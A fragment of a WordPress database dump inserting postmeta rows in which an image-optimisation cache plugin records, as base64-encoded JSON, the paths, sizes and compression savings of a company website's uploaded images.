INSERT INTO `wp_postmeta` VALUES (28831, 2382, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUuanBnIiwid2lkdGgiOjEzOTEsImhlaWdodCI6Njg2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS5qcGciLCJyZWR1Y3Rpb24iOjIxOTg4MSwidGltZSI6MTQ4MzU0ODczNywiaWQiOiIyMzgyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3MzksImlkIjoyMzgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtODAweDM5NS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjM5NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTgwMHgzOTUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS04MDB4Mzk1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODc0MiwiaWQiOjIzODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS03Njh4Mzc5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6Mzc5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtNzY4eDM3OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTc2OHgzNzkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzQ0LCJpZCI6MjM4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3NDYsImlkIjoyMzgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODc0OSwiaWQiOjIzODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzUxLCJpZCI6MjM4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3NTMsImlkIjoyMzgyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28832, 2376, 'wpfc_optimisation_reduction', '2945946'); 
INSERT INTO `wp_postmeta` VALUES (28833, 2376, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LmpwZyIsIndpZHRoIjozMzE3LCJoZWlnaHQiOjIyMTEsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjcuanBnIiwicmVkdWN0aW9uIjoyOTQ1OTM4LCJ0aW1lIjoxNDgzNTQ4NzY3LCJpZCI6IjIzNzYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODc3MCwiaWQiOjIzNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzczLCJpZCI6MjM3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3NzYsImlkIjoyMzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzgwLCJpZCI6MjM3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3ODIsImlkIjoyMzc2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja184MzI4NTc2Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODc4NSwiaWQiOjIzNzZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzgzMjg1NzY3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4Nzg3LCJpZCI6MjM3Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfODMyODU3NjctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3OTAsImlkIjoyMzc2fV0='); 
INSERT INTO `wp_postmeta` VALUES (28834, 2357, 'wpfc_optimisation_reduction', '8528'); 
INSERT INTO `wp_postmeta` VALUES (28835, 2357, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LmpwZyIsIndpZHRoIjo0Mjg4LCJoZWlnaHQiOjI4NDgsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NDg3OTUsImlkIjoiMjM1NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3MjUsInRpbWUiOjE0ODM1NDg3OTgsImlkIjoyMzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC04MDB4NTMxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC04MDB4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC04MDB4NTMxLmpwZyIsInJlZHVjdGlvbiI6MTMwOCwidGltZSI6MTQ4MzU0ODgwMiwiaWQiOjIzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTc2OHg1MTAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTc2OHg1MTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTc2OHg1MTAuanBnIiwicmVkdWN0aW9uIjoxMTc0LCJ0aW1lIjoxNDgzNTQ4ODA3LCJpZCI6MjM1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMTYwMHgxMDYzLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTE2MDB4MTA2My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMTYwMHgxMDYzLmpwZyIsInJlZHVjdGlvbiI6MjcxNiwidGltZSI6MTQ4MzU0ODgxMiwiaWQiOjIzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NDIsInRpbWUiOjE0ODM1NDg4MTUsImlkIjoyMzU3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja182NzQwNjQwNC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDcwLCJ0aW1lIjoxNDgzNTQ4ODE5LCJpZCI6MjM1N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNjc0MDY0MDQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjUzOSwidGltZSI6MTQ4MzU0ODgyMiwiaWQiOjIzNTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzY3NDA2NDA0LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo5NTQsInRpbWUiOjE0ODM1NDg4MjYsImlkIjoyMzU3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28836, 2349, 'wpfc_optimisation_reduction', '12977'); 
